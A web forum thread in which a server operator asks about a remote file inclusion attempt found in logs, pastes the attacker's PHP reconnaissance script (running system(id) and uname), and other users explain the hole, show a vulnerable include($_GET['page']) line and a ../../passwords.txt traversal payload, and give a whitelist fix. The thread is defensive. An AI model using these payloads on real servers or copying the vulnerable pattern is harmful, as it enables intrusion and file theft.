help

php-dunce

Can any php person help me out here please
I run several flash servers and recently have noticed a strange error entry in my logs. The error is as follows:-
GET /red5/guestbook/index.php%20//?include_path=http://******.com/v6id.txt??? HTTP/1.1 with response code(s) 404 2 responses
(i have hidden the actual url)
I have examined the .txt page this person is trying to include and it contains the following , So can someone here tell me what this is please
contents of .txt page :-

echo "PPPoE ";
$un = @php_uname();
$id1 = system(id);
$pwd1 = @getcwd();
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {
$free = 0;
}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {
$all = 0;
}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "PPPoE was here .. ";
echo "uname -a: $un ";
echo "os: $os ";
echo "id: $id1 ";
echo "free: $free ";
echo "used: $used ";
echo "total: $all ";
exit;

cahva

Those are fairly common which can be found almost in every site's logs. Hackers try to use(if possible) vulneralibities of the site(=badly written code). That particular piece of code is not itself harmfull but hacker would get usefull information from you. I've seen hack scripts that are almost full blown applications which were used to spam, bot, torrent tracker, gui for shell etc. For example if you had this lousy code in your site:

// lets say you have your url like this normally: index.php?page=something
include($_GET['page']);

And attacker has put his/her own url(which you found), it would execute the code as it were executed on your server.

Fortunately this is easily taken care off(and I dont think you got hacked in any way). Just disable allow_url_include and theres no way attackers could take advantage of your site in any case(concerning this issue). For maximal security, use Suhosin module also which will give you more finegrained control of your security.

matic240sx

cahva;10889402 wrote:
Those are fairly common which can be found almost in every site's logs. Hackers try to use(if possible) vulneralibities of the site(=badly written code). That particular piece of code is not itself harmfull but hacker would get usefull information from you. I've seen hack scripts that are almost full blown applications which were used to spam, bot, torrent tracker, gui for shell etc. For example if you had this lousy code in your site:
// lets say you have your url like this normally: index.php?page=something
include($_GET['page']);
And attacker has put his/her own url(which you found), it would execute the code as it were executed on your server.

Fortunately this is easily taken care off(and I dont think you got hacked in any way). Just disable allow_url_include and theres no way attackers could take advantage of your site in any case(concerning this issue). For maximal security, use Suhosin module also which will give you more finegrained control of your security.

i have a forum on one of my sites that uses your example with an url and $_GET['page']. To avoid outside pages from being include i did something like this...

$page = "../forum/". $_GET['page'];

My page that uses the GET['page'] is located in the root of the server.

Does this still leave me open to an attack? Not to post hijack but I thought I would give my fix for the problem and make sure I am not giving bad advice.

cahva

Well I dont think attacker can exploit your code if theres that ../forum at the start. Atleast not with url anyway. But attacker could try to fetch information from your server. Heres a situation:
You have passwords saved in your root directory as passwords.txt. Attacker would just have to quess the filepath and name and could get it printed to browser if the file permissions also permits it.

page=../../passwords.txt

$page = "../forum/". $_GET['page'];
/* this now becomes */
$page = "../forum/../../passwords.txt";

And with include it will print the passwords.txt to browser. This would be extremely dangerous if the server itself was badly configured and lets php scripts access system files.

So basicly, never ever put variables coming from outside straight to include. With include you must be extra careful. Best would be that you have an array of permitted pages which to include:

$safepages = array('forum','contact','main');
$page = isset($_GET['page']) ? basename($_GET['page']) : 'main'; // will default to main if not set

if (in_array($page,$safepages)) {
    include('incdir/'.$page.'.php');
} else {
    include('incdir/main.php');
}

Theres basename function also used so it will strip all ../ and get only the last one.